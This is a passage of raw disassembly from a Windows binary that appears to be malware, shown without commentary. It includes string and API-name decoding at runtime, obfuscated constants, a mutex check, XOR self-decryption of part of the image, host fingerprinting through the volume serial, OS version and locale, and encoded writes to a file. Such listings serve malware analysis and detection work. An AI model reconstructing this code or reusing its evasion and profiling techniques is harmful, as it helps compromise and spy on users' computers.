call ds:dword_44864C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2AC], eax
mov ebx, eax
mov ds:dword_447380[ebx], edi
push offset dword_44AF70
call sub_43C507
mov [ebp+var_2B0], eax
push offset dword_44AF6C
call sub_43C507
add esp, 28h
mov [ebp+var_2B4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov edi, eax
push ds:dword_44737C[edi]
mov edi, dword_44A1B0
add edi, 125h
push edi
mov edi, dword_44A1AC
add edi, 34h
add edi, dword_44A1A0
push edi
mov edi, dword_44A25C
add edi, 41h
add edi, dword_44A1D4
push edi
mov edi, dword_44A120
lea edi, [edi+edi+3Ch]
push edi
push 50800003h
mov edi, [ebp+var_2B4]
push edi
mov edi, [ebp+var_2B0]
push edi
movsx edi, word_44A0E0
add edi, dword_44A108
sub edi, 7
push edi
call ds:dword_44864C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2BC], eax
mov ebx, eax
mov ds:dword_447384[ebx], edi
movsx eax, word_44A0E8
add eax, dword_44A1F8
sub eax, 3
mov [ebp+var_102], ax
jmp loc_43E7D6
; ---------------------------------------------------------------------------
loc_43E710: ; CODE XREF: sub_43DB8B+C5E�j
push offset dword_44AF64
call sub_43C507
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call ds:dword_449634
lea eax, [ebp+var_2C6]
push eax
movsx eax, word_44A208
movsx edx, word_44A124
add eax, edx
sub eax, 0Bh
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
push ds:dword_447380[eax]
call ds:dword_444014 ; SendMessageA
push offset word_44AF5A
call sub_43C507
movzx edi, [ebp+var_102]
movsx ebx, word_44A0E0
lea edi, [edi+ebx+5]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call ds:dword_449634
add esp, 20h
lea eax, [ebp+var_2C6]
push eax
movsx eax, word_44A0A4
add eax, dword_44A134
sub eax, 0Eh
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push ds:dword_447384[eax]
call ds:dword_444014 ; SendMessageA
inc [ebp+var_102]
loc_43E7D6: ; CODE XREF: sub_43DB8B+B80�j
movzx eax, [ebp+var_102]
movsx edx, word_44A208
add edx, 8
cmp eax, edx
jl loc_43E710
push offset word_44AF52
call sub_43C507
mov [ebp+var_2C0], eax
push offset word_44AF4E
call sub_43C507
mov [ebp+var_2C4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp-2C8h], eax
mov edi, eax
push ds:dword_44737C[edi]
mov edi, dword_44A204
add edi, 17h
push edi
movsx edi, word_44A0BC
mov ebx, dword_44A1D8
lea edi, [edi+ebx+43h]
push edi
mov edi, dword_44A1EC
add edi, 74h
push edi
mov edi, dword_44A1F4
add edi, 2Bh
push edi
push 50800000h
mov edi, [ebp+var_2C4]
push edi
mov edi, [ebp+var_2C0]
push edi
push 200h
call ds:dword_44864C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
mov ebx, eax
mov ds:dword_447388[ebx], edi
mov eax, dword_44A1D4
sub eax, 2
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push ds:dword_447388[eax]
call ds:dword_444014 ; SendMessageA
push offset dword_44AF44
call sub_43C507
mov [ebp+var_2D4], eax
push offset word_44AF22
call sub_43C507
mov [ebp+var_2D8], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov edi, eax
push ds:dword_44737C[edi]
movsx edi, word_44A27C
add edi, 3Ch
push edi
push [ebp+var_120]
movsx edi, word_44A100
add edi, 4Ch
push edi
movsx edi, word_44A0C0
add edi, 94h
push edi
push 50000000h
mov edi, [ebp+var_2D8]
push edi
mov edi, [ebp+var_2D4]
push edi
movsx edi, word_44A1E0
movsx ebx, word_44A174
add edi, ebx
sub edi, 0Ah
push edi
call ds:dword_44864C ; CreateWindowExA
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call ds:dword_444014 ; SendMessageA
push offset dword_44AF18
call sub_43C507
mov [ebp+var_2E0], eax
push offset word_44AEFE
call sub_43C507
add esp, 18h
mov [ebp+var_2E4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov edi, eax
push ds:dword_44737C[edi]
movsx edi, word_44A150
mov ebx, dword_44A288
lea edi, [edi+ebx+9]
push edi
mov edi, dword_44A1E4
add edi, 97h
push edi
mov edi, dword_44A1B0
add edi, 0F1h
add edi, dword_44A278
mov ebx, dword_44A198
add ebx, 1Eh
movsx edx, word_44A1E0
add ebx, edx
sub edi, ebx
push edi
movsx edi, word_44A0D0
add edi, 3
push edi
push 50800000h
mov edi, [ebp+var_2E4]
push edi
mov edi, [ebp+var_2E0]
push edi
mov edi, dword_44A17C
sub edi, 5
push edi
call ds:dword_44864C ; CreateWindowExA
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2EC], eax
mov ebx, eax
mov ds:dword_44738C[ebx], edi
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2F0], eax
push ds:dword_44738C[eax]
call ds:dword_444014 ; SendMessageA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push ds:dword_447380[eax]
call ds:dword_449628 ; GetWindowLongA
mov edi, [ebp+var_2F8]
mov ds:dword_447390[edi], eax
push offset sub_43F9F6
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push ds:dword_447380[eax]
call ds:dword_4465FC ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push ds:dword_447384[eax]
call ds:dword_449628 ; GetWindowLongA
mov edi, [ebp+var_304]
mov ds:dword_447394[edi], eax
push offset sub_43F9F6
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push ds:dword_447384[eax]
call ds:dword_4465FC ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
mov [ebp+var_310], eax
push ds:dword_447388[eax]
call ds:dword_449628 ; GetWindowLongA
mov edi, [ebp+var_310]
mov ds:dword_447398[edi], eax
push offset sub_43F9F6
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_314], eax
push ds:dword_447388[eax]
call ds:dword_4465FC ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_318], eax
mov [ebp+var_31C], eax
push ds:dword_44737C[eax]
call ds:dword_449628 ; GetWindowLongA
mov edi, [ebp+var_31C]
mov ds:dword_44739C[edi], eax
push offset sub_43F9F6
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_320], eax
push ds:dword_44737C[eax]
call ds:dword_4465FC ; SetWindowLongA
mov eax, 30h
mul esi
mov [ebp+var_324], eax
push ds:dword_447380[eax]
call ds:dword_446A40 ; SetFocus
loc_43EBBA: ; CODE XREF: sub_43DB8B+10�j
; sub_43DB8B+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43DB8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EBBF proc near ; DATA XREF: .data:0044A35C�o
push ebp
mov ebp, esp
mov eax, dword_44A20C
add eax, dword_44A198
sub eax, 8
cmp ds:dword_449784, eax
jbe short loc_43EBE3
push offset dword_449784
call ds:dword_444010 ; InterlockedDecrement
loc_43EBE3: ; CODE XREF: sub_43EBBF+17�j
mov eax, ds:dword_449784
pop ebp
retn 4
sub_43EBBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EBEC proc near ; DATA XREF: sub_43EC0A+16D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
mov eax, [ebp+arg_4]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_446618 ; DefWindowProcA
pop edi
pop ebp
retn 10h
sub_43EBEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EC0A proc near ; DATA XREF: sub_44083E+C�o
; sub_44083E+299�o
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 15Ch
push ebx
push esi
push edi
call sub_439DDE
call sub_43B4B3
call sub_43B3CC
call sub_4394DD
call sub_440D4B
call sub_43969E
call sub_43C26E
call sub_43C1C6
call sub_4397A3
mov esi, eax
loc_43EC45: ; CODE XREF: sub_43EC0A+97�j
call sub_4396F6
mov edx, eax
mov [ebp+var_144], dl
movzx eax, [ebp+var_144]
mov edx, dword_44A0A0
sub edx, 2
cmp eax, edx
jnz short loc_43EC7D
movsx eax, word_44A1DC
add eax, dword_44A194
sub eax, 9
push eax
call ds:dword_449664 ; ExitThread
loc_43EC7D: ; CODE XREF: sub_43EC0A+5A�j
movzx eax, [ebp+var_144]
mov edx, dword_44A1F8
sub edx, 2
cmp eax, edx
jnz short loc_43ECA3
mov eax, dword_44A228
add eax, 61h
push eax
call ds:dword_449630
pop ecx
jmp short loc_43EC45
; ---------------------------------------------------------------------------
loc_43ECA3: ; CODE XREF: sub_43EC0A+85�j
or esi, esi
jnz loc_43ED5D
push offset byte_44AEF3
call sub_43C507
mov [ebp+var_154], eax
push offset byte_44AEE9
call sub_43C507
push eax
mov edx, [ebp+var_154]
push edx
lea edx, [ebp+var_143]
push edx
call ds:dword_449634
lea eax, [ebp+var_143]
push eax
push 0
push 0
call ds:dword_44961C ; CreateMutexA
mov ebx, eax
push offset byte_44AEDD
call sub_43C507
mov [ebp+var_158], eax
push offset byte_44AED3
call sub_43C507
mov edx, dword_44A234
add edx, dword_44A23C
sub edx, 7
push edx
push eax
mov edx, [ebp+var_158]
push edx
lea edx, [ebp+var_143]
push edx
call ds:dword_449634
add esp, 2Ch
lea eax, [ebp+var_143]
push eax
push 0
push 0
call ds:dword_44961C ; CreateMutexA
mov ebx, eax
or ebx, ebx
jnz short loc_43ED5D
movsx eax, word_44A0CC
add eax, dword_44A138
sub eax, 6
push eax
call ds:dword_449664 ; ExitThread
loc_43ED5D: ; CODE XREF: sub_43EC0A+9B�j
; sub_43EC0A+13A�j
push 0
call ds:dword_4465E8 ; GetModuleHandleA
mov edi, eax
push offset byte_44AEC9
call sub_43C507
mov [ebp+var_20], eax
mov [ebp+var_34], edi
lea eax, sub_43EBEC
mov [ebp+var_40], eax
push 7F00h
push 0
call ds:dword_447220 ; LoadCursorA
mov [ebp+var_2C], eax
push 7F03h
push 0
call ds:dword_449620 ; LoadIconA
mov [ebp+var_30], eax
and [ebp+var_24], 0
push 0
call ds:dword_445120 ; GetStockObject
mov [ebp+var_28], eax
mov [ebp+var_44], 3
mov eax, dword_44A1C4
add eax, dword_44A19C
sub eax, 0Bh
mov [ebp+var_3C], eax
mov eax, dword_44A108
movsx edx, word_44A0FC
add eax, edx
sub eax, 0Ch
mov [ebp+var_38], eax
lea eax, [ebp+var_44]
push eax
call ds:dword_4460DC ; RegisterClassA
push offset byte_44AEBF
call sub_43C507
mov [ebp+var_15C], eax
push offset byte_44AEB5
call sub_43C507
push 0
push edi
push 0
push 0
mov edx, dword_44A228
add edx, dword_44A1D8
sub edx, 0Ch
push edx
movsx edx, word_44A124
sub edx, 6
push edx
mov edx, dword_44A214
mov ecx, edx
sub ecx, 9
push ecx
movsx ecx, word_44A0E0
dec ecx
push ecx
push 0CA0000h
push eax
mov ecx, [ebp+var_15C]
push ecx
mov ecx, dword_44A254
add ecx, edx
mov edx, ecx
sub edx, 12h
push edx
call ds:dword_44864C ; CreateWindowExA
mov ds:dword_446610, eax
lea eax, [ebp+var_148]
push eax
push edi
call sub_43F122
add esp, 14h
mov [ebp+var_14C], eax
mov ds:off_449610, eax
mov eax, [ebp+var_148]
mov ds:dword_446614, eax
or esi, esi
jnz short loc_43EEA0
call sub_439B69
mov eax, dword_44A090
add eax, dword_44A110
sub eax, 8
mov ds:dword_449638, eax
jmp short loc_43EEB9
; ---------------------------------------------------------------------------
loc_43EEA0: ; CODE XREF: sub_43EC0A+27A�j
movsx eax, word_44A0C0
mov edx, dword_44A220
lea eax, [eax+edx+3A92h]
mov ds:dword_449638, eax
loc_43EEB9: ; CODE XREF: sub_43EC0A+294�j
lea eax, [ebp+var_150]
push eax
mov eax, dword_44A1D8
add eax, dword_44A0DC
sub eax, 0Ch
push eax
push 0
push offset sub_4399CB
mov eax, dword_44A21C
add eax, dword_44A224
sub eax, 0Dh
push eax
push 0
call ds:dword_449B90 ; CreateThread
push eax
call ds:dword_448654 ; CloseHandle
or esi, esi
jnz short loc_43EF18
call sub_439B7B
call sub_43D6B1
jmp short loc_43EF18
; ---------------------------------------------------------------------------
loc_43EF04: ; CODE XREF: sub_43EC0A+330�j
lea eax, [ebp+var_1C]
push eax
call ds:dword_44977C ; TranslateMessage
lea eax, [ebp+var_1C]
push eax
call ds:dword_444050 ; DispatchMessageA
loc_43EF18: ; CODE XREF: sub_43EC0A+2EC�j
; sub_43EC0A+2F8�j
movsx eax, word_44A174
sub eax, 7
push eax
mov eax, dword_44A134
sub eax, 8
push eax
push 0
lea eax, [ebp+var_1C]
push eax
call ds:dword_448630 ; GetMessageA
or eax, eax
jnz short loc_43EF04
pop edi
pop esi
pop ebx
leave
retn 4
sub_43EC0A endp
; =============== S U B R O U T I N E =======================================
sub_43EF43 proc near ; DATA XREF: .data:0044A3A4�o
mov eax, 80004001h
retn 8
sub_43EF43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EF4B proc near ; DATA XREF: .data:0044A358�o
push ebp
mov ebp, esp
push offset dword_449784
call ds:dword_446A3C ; InterlockedIncrement
mov eax, ds:dword_449784
pop ebp
retn 4
sub_43EF4B endp
; =============== S U B R O U T I N E =======================================
sub_43EF62 proc near ; CODE XREF: sub_44083E+25C�p
push edi
push offset byte_44AEA7
call sub_43C507
pop ecx
push eax
call ds:dword_4465E8 ; GetModuleHandleA
mov dword_44A298, eax
test eax, eax
jnz short loc_43EF95
push offset byte_44AE99
call sub_43C507
pop ecx
push eax
call ds:dword_447244 ; LoadLibraryA
mov dword_44A298, eax
loc_43EF95: ; CODE XREF: sub_43EF62+1A�j
push offset byte_44AE8F
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449630, eax
push offset dword_44AE84
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444030, eax
push offset dword_44AE7C
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444054, eax
push offset dword_44AE74
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446A38, eax
push offset word_44AE6A
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446A2C, eax
push offset dword_44AE60
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44964C, eax
push offset word_44AE56
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_448638, eax
push offset dword_44AE4C
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_448644, eax
push offset dword_44AE44
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449BAC, eax
push offset byte_44AE3B
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449600, eax
push offset byte_44AE31
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444020, eax
push offset word_44AE26
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449634, eax
push offset word_44AE1A
call sub_43C507
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44724C, eax
push offset dword_44AE10
call sub_43C507
add esp, 38h
push eax
push dword_44A298
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4461F4, eax
pop edi
retn
sub_43EF62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F122 proc near ; CODE XREF: sub_43EC0A+25A�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov ecx, esi
add ecx, eax
mov eax, [ecx+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
mov edx, dword_44A18C
add edx, 200h
mov ebx, eax
imul ebx, edx
mov eax, dword_44A0EC
mov ecx, eax
add ecx, dword_44A09C
sub ecx, 7
jmp short loc_43F17A
; ---------------------------------------------------------------------------
loc_43F16C: ; CODE XREF: sub_43F122+5A�j
movzx eax, byte ptr [esi+ecx]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+ecx], al
inc ecx
loc_43F17A: ; CODE XREF: sub_43F122+48�j
cmp ecx, ebx
jb short loc_43F16C
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop esi
pop ebx
leave
retn
sub_43F122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F189 proc near ; CODE XREF: sub_439B7B+AB�p
var_1AC = dword ptr -1ACh
var_1A8 = byte ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call ds:dword_449B98 ; GetVersionExA
cmp [ebp+var_183], 1
jnz short loc_43F1CF
push offset word_44AE0A
call sub_43C507
push eax
push edi
call ds:dword_444020
add esp, 0Ch
loc_43F1CF: ; CODE XREF: sub_43F189+2F�j
cmp [ebp+var_183], 2
jnz short loc_43F1ED
push offset dword_44AE04
call sub_43C507
push eax
push edi
call ds:dword_449634
add esp, 0Ch
loc_43F1ED: ; CODE XREF: sub_43F189+4D�j
push offset dword_44ADF8
call sub_43C507
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea esi, [ebp+var_FF]
push esi
call ds:dword_449634
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_444020
push offset byte_44ADF1
call sub_43C507
mov esi, dword_44A244
sub esi, 4
push esi
push 0
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_198]
push esi
push 0FFh
lea esi, [ebp+var_FF]
push esi
push eax
call ds:dword_449614 ; GetVolumeInformationA
push offset byte_44ADE9
call sub_43C507
push [ebp+var_198]
push eax
lea esi, [ebp+var_FF]
push esi
call ds:dword_449634
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_444020
push 0FFh
lea eax, [ebp+var_FF]
push eax
movsx eax, word_44A24C
movsx edx, word_44A1E0
add eax, edx
sub eax, 9
push eax
push 400h
call ds:dword_4465F8 ; GetLocaleInfoA
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_444020
push offset dword_44ADE4
call sub_43C507
push eax
push edi
call ds:dword_444020
mov [ebp+var_1A0], 0FFh
push offset byte_44ADB7
call sub_43C507
mov [ebp+var_1AC], eax
push offset asc_44ADAA ; "\t"
call sub_43C507
lea esi, [ebp+var_1A8]
push esi
lea esi, [ebp+var_1A0]
push esi
lea esi, [ebp+var_FF]
push esi
push eax
mov esi, [ebp+var_1AC]
push esi
push 80000002h
call sub_43C3CE
add esp, 70h
mov [ebp+var_1A4], eax
mov eax, dword_44A15C
sub eax, 8
cmp [ebp+var_1A4], eax
jnz short loc_43F34F
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_444020
add esp, 8
loc_43F34F: ; CODE XREF: sub_43F189+1B3�j
pop edi
pop esi
leave
retn
sub_43F189 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F353 proc near ; CODE XREF: sub_439B7B+C7�p
; sub_43AF47+3D1�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, dword_44A1D4
sub esi, 2
jmp short loc_43F39B
; ---------------------------------------------------------------------------
loc_43F367: ; CODE XREF: sub_43F353+4B�j
call ds:dword_449BAC
movsx edi, word_44A22C
mov edx, dword_44A214
lea edi, [edi+edx+51h]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_43F39B: ; CODE XREF: sub_43F353+12�j
cmp esi, [ebp+arg_4]
jl short loc_43F367
mov eax, [ebp+arg_4]
mov edx, dword_44A190
sub edx, 2
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_43F353 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F3B6 proc near ; DATA XREF: sub_439B7B+85�o
; sub_439B7B+90�o
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
movsx eax, word_44A1F0
sub eax, 3
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_43F3E8
push offset dword_4460F0
lea eax, [ebp+var_110]
push eax
call sub_442F8C
jmp short loc_43F3F9
; ---------------------------------------------------------------------------
loc_43F3E8: ; CODE XREF: sub_43F3B6+1D�j
push offset dword_447260
lea eax, [ebp+var_110]
push eax
call sub_442F8C
loc_43F3F9: ; CODE XREF: sub_43F3B6+30�j
push 0
movsx eax, word_44A160
dec eax
push eax
push 4
push 0
mov eax, dword_44A18C
movsx edx, word_44A240
add eax, edx
sub eax, 2
push eax
push 40000000h
lea eax, [ebp+var_110]
push eax
call ds:dword_449788 ; CreateFileA
mov [ebp+var_8], eax
push 2
push 0
mov eax, dword_44A1A0
add eax, dword_44A210
sub eax, 4
push eax
push [ebp+var_8]
call ds:dword_449B9C ; SetFilePointer
push offset word_44ADA2
call sub_43C507
pop ecx
push 0
lea edx, [ebp+var_C]
push edx
movsx edx, word_44A0B0
movsx ecx, word_44A1B4
add edx, ecx
sub edx, 7
push edx
push eax
push [ebp+var_8]
call ds:dword_449B8C ; WriteFile
push 493E0h
push 40h
call ds:dword_446A34 ; LocalAlloc
mov ebx, eax
push 61A80h
push 40h
call ds:dword_446A34 ; LocalAlloc
mov esi, eax
mov eax, dword_44A1BC
sub eax, 9
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_43F4B6
mov eax, [ebp+arg_0]
inc eax
push eax
push ebx
call sub_442F8C
jmp short loc_43F4BF
; ---------------------------------------------------------------------------
loc_43F4B6: ; CODE XREF: sub_43F3B6+F1�j
push [ebp+arg_0]
push ebx
call sub_442F8C
loc_43F4BF: ; CODE XREF: sub_43F3B6+FE�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_43F4C4: ; CODE XREF: sub_43F3B6+113�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F4C4
mov [ebp+var_4], eax
mov edi, dword_44A28C
sub edi, 6
jmp short loc_43F4FF
; ---------------------------------------------------------------------------
loc_43F4D9: ; CODE XREF: sub_43F3B6+14C�j
movzx eax, byte ptr [ebx+edi]
mov [ebp+var_114], eax
mov eax, edi
mul edi
mov [ebp+var_118], eax
mov eax, [ebp+var_114]
mov edx, [ebp+var_118]
add eax, edx
mov [ebx+edi], al
inc edi
loc_43F4FF: ; CODE XREF: sub_43F3B6+121�j
cmp edi, [ebp+var_4]
jb short loc_43F4D9
mov eax, dword_44A0C4
add eax, 61A79h
push eax
push esi
push [ebp+var_4]
push ebx
call sub_43AE20
add esp, 10h
movsx eax, word_44A260
mov edi, eax
add edi, dword_44A224
sub edi, 7
jmp short loc_43F545
; ---------------------------------------------------------------------------
loc_43F530: ; CODE XREF: sub_43F3B6+19D�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_43F53A
mov byte ptr [esi+edi], 28h
loc_43F53A: ; CODE XREF: sub_43F3B6+17E�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_43F544
mov byte ptr [esi+edi], 29h
loc_43F544: ; CODE XREF: sub_43F3B6+188�j
inc edi
loc_43F545: ; CODE XREF: sub_43F3B6+178�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43F54A: ; CODE XREF: sub_43F3B6+199�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F54A
cmp edi, eax
jb short loc_43F530
mov eax, dword_44A12C
sub eax, 8
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_43F596
push offset byte_44AD9D
call sub_43C507
add esp, 4
push 0
lea edi, [ebp+var_C]
push edi
mov edi, dword_44A244
movsx edx, word_44A0B0
add edi, edx
sub edi, 0Ah
push edi
push eax
push [ebp+var_8]
call ds:dword_449B8C ; WriteFile
loc_43F596: ; CODE XREF: sub_43F3B6+1AE�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43F59B: ; CODE XREF: sub_43F3B6+1EA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F59B
push 0
lea edx, [ebp+var_C]
push edx
mov edx, dword_44A110
add edx, dword_44A238
sub edx, 4
mov edi, eax
add edi, edx
push edi
push esi
push [ebp+var_8]
call ds:dword_449B8C ; WriteFile
push [ebp+var_8]
call ds:dword_448654 ; CloseHandle
push ebx
call ds:dword_44661C ; LocalFree
push esi
call ds:dword_44661C ; LocalFree
pop edi
pop esi
pop ebx
leave
retn
sub_43F3B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F5E2 proc near ; CODE XREF: sub_439B69+2�p
; sub_439B69+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
lea eax, [ebp+var_104]
push eax
mov eax, dword_44A1D0
sub eax, 7
push eax
push 0
push [ebp+arg_0]
push 0
call ds:dword_446A44
mov edi, eax
or edi, edi
jnz short loc_43F63A
push offset dword_44AD98
call sub_43C507
push eax
lea edi, [ebp+var_104]
push edi
call ds:dword_444020
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_43D357
add esp, 18h
loc_43F63A: ; CODE XREF: sub_43F5E2+2B�j
pop edi
leave
retn
sub_43F5E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F63D proc near ; CODE XREF: sub_439857+FC�p
; sub_43D6B1+17A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov eax, dword_44A26C
movsx edx, word_44A118
mov esi, eax
add esi, edx
sub esi, 0Ch
lea eax, [ebp+var_4]
push eax
push offset dword_44BA38
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, dword_44A1D4
sub eax, 2
cmp edi, eax
jz short loc_43F680
xor eax, eax
jmp short loc_43F6DE
; ---------------------------------------------------------------------------
loc_43F680: ; CODE XREF: sub_43F63D+3D�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
mov eax, dword_44A0B8
sub eax, 3
cmp edi, eax
jnz short loc_43F6D3
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
mov eax, dword_44A1CC
add eax, dword_44A284
sub eax, 0Fh
cmp edi, eax
jnz short loc_43F6CA
mov esi, dword_44A244
sub esi, 3
loc_43F6CA: ; CODE XREF: sub_43F63D+82�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_43F6D3: ; CODE XREF: sub_43F63D+5F�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_43F6DE: ; CODE XREF: sub_43F63D+41�j
